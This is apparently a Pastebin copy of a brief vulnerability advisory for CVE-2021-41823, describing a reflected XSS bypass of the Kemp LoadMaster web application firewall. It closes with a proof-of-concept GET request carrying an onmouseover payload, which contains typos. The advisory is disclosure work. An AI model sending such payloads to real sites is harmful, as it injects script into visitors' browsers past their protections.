Headline
CVE-2021-41823: 1. ADVISORY INFORMATION=======================Product: Kemp Web Appli - Pastebin.com
The Web Application Firewall (WAF) in Kemp LoadMaster 7.2.54.1 allows certain uses of onmouseover to bypass an XSS protection mechanism.
Untitled
a guest
Dec 30th, 2022
20
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.56 KB | Cybersecurity | 0 0
1. ADVISORY INFORMATION
=======================
Product: Kemp Web Application Firewall
Vendor URL: https://kemptechnologies.com/en/solutions/waf
Version: 7.2.54.1
Type: Bypass XSS WAF prottection
Date published: 2022-12-30
CVE: CVE-2021-41823
2. VULNERABILITY DETAILS
========================
The kemp waf allows to bypass xss protection and inyect the following xss reflected payload "onmouseover=’promt()"
3. PROOF OF CONCEPT
===================
GET /directory/vulnerable-xss.html"onmouseover=’promt()" HTTP/1.1